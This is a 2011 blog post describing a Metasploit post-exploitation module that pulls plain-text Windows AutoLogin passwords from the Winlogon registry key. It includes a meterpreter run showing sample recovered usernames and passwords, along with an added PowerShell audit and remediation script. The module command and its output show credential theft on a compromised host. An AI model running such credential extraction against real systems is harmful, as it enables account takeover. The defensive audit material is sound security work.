Sunday, August 21, 2011

[Metasploit] Post | Windows Gather AutoLogin User Credential Extractor

This module extracts the plain-text Windows user login password from the registry. It relies on a Windows feature (present from Windows 2000 through the current Windows 7) that lets a user or a third-party Windows utility configure user AutoLogin by writing the password in plain text into the DefaultPassword or AltDefaultPassword value under the registry key HKLM\Software\Microsoft\Windows NT\WinLogon. That key is readable by all users, so any local account can recover the password.
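For the defending side, the same registry location can be audited from PowerShell. The script below is an added example, not part of the original post or of the Metasploit module: it reads the Default* and AltDefault* AutoLogin values, reports whether a plain-text password is set (reporting its length rather than the secret itself), checks whether low-privilege principals can read the key, and optionally removes the plain-text values. It assumes the full key path HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (the post abbreviates it) and the standard value names AutoAdminLogon, DefaultDomainName, DefaultUserName, DefaultPassword and their AltDefault* counterparts; the function name Test-WinlogonAutoLogon and the -Remediate switch are this example's own.

```powershell
# Added example (not from the original post or the Metasploit module).
# Audits the Winlogon key for plain-text AutoLogin credentials and reports who can read them.
# Assumes the standard Winlogon key path below; run as Administrator to use -Remediate.

function Test-WinlogonAutoLogon {
    [CmdletBinding()]
    param(
        [string]$KeyPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
        [switch]$Remediate   # remove plain-text password values and turn AutoAdminLogon off
    )

    $props = Get-ItemProperty -Path $KeyPath -ErrorAction Stop

    # The two credential sets the module reads: Default* and AltDefault*
    $sets = @(
        @{ Label = 'Default';    Domain = 'DefaultDomainName';    User = 'DefaultUserName';    Password = 'DefaultPassword' },
        @{ Label = 'AltDefault'; Domain = 'AltDefaultDomainName'; User = 'AltDefaultUserName'; Password = 'AltDefaultPassword' }
    )

    $findings = foreach ($s in $sets) {
        $pw = $props.($s.Password)
        if (-not [string]::IsNullOrEmpty($pw)) {
            [pscustomobject]@{
                Set            = $s.Label
                Domain         = $props.($s.Domain)
                User           = $props.($s.User)
                PasswordValue  = $s.Password
                PasswordLength = $pw.Length   # report the length, never the secret itself
            }
        }
    }

    # Who can read the key? Read access for non-administrators is what turns
    # a convenience setting into a credential disclosure.
    $readKey = [int][System.Security.AccessControl.RegistryRights]::ReadKey
    $acl = Get-Acl -Path $KeyPath
    $lowPrivReaders = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -match 'Users|Everyone|Authenticated Users' -and
        (([int]$_.RegistryRights -band $readKey) -ne 0)
    } | ForEach-Object { $_.IdentityReference.Value }

    $result = [pscustomobject]@{
        KeyPath        = $KeyPath
        AutoAdminLogon = $props.AutoAdminLogon
        Findings       = @($findings)
        LowPrivReaders = @($lowPrivReaders)
    }

    if ($Remediate -and $result.Findings.Count -gt 0) {
        foreach ($f in $result.Findings) {
            Remove-ItemProperty -Path $KeyPath -Name $f.PasswordValue -ErrorAction Stop
        }
        Set-ItemProperty -Path $KeyPath -Name 'AutoAdminLogon' -Value '0'
        Write-Verbose "Removed plain-text AutoLogin password(s) and disabled AutoAdminLogon."
    }

    return $result
}

# Usage: report only (add -Remediate from an elevated prompt to clean up)
Test-WinlogonAutoLogon | Format-List
```

A non-empty Findings list together with a non-empty LowPrivReaders list means exactly the situation the module exploits: any local user can read the password. Where AutoLogin is genuinely required, the Sysinternals Autologon tool stores the password as an LSA secret instead of a plain-text registry value, which keeps it out of reach of unprivileged users (though still recoverable by administrators), so the remediation is to delete the plain-text value and, if needed, reconfigure AutoLogin that way.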

meterpreter > run post/windows/gather/credentials/windows_autologin

[*] Running against John-PC @ session 1
[+] DefaultDomain=DEPT_SALES, DefaultUser=john, DefaultPassword=pa55w0rd
[+] AltDomain=DEPT_HR, AltUser=jack, AltPassword=dr0w55p
[*] Storing data...
[*] Windows AutoLogin User Credentials saved in: /root/.msf4/loot/20110821034449_default_10.23.12.11_windows.autologi_460131.txt